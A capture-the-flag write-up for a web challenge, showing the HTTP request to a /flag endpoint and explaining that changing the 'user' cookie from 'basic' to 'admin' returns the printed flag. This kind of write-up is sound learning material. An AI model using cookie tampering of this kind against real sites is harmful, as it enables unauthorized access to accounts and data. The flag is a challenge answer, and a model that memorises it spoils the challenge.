Category

Web

Description

I just started making my new website. Can you pen-test it and see if you can get the super-secret flag?

Solution

When entering the challenge page we get the following message.

Clicking the link we get a message telling us that only admins can get the flag.

Lets take a look at the request.

GET /flag HTTP/2
Host: mhsctf-newsitewhodis.0xmmalik.repl.co
Cookie: user=basic
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://mhsctf-newsitewhodis.0xmmalik.repl.co/
Upgrade-Insecure-Requests: 1
Te: trailers

Here we can see the cookie user with the value basic. Changing the cookie value to admin and resending returns the flag.

Hello there, Admin! Here is your super-secret flag: flag{1t$-@_m3_Mari0}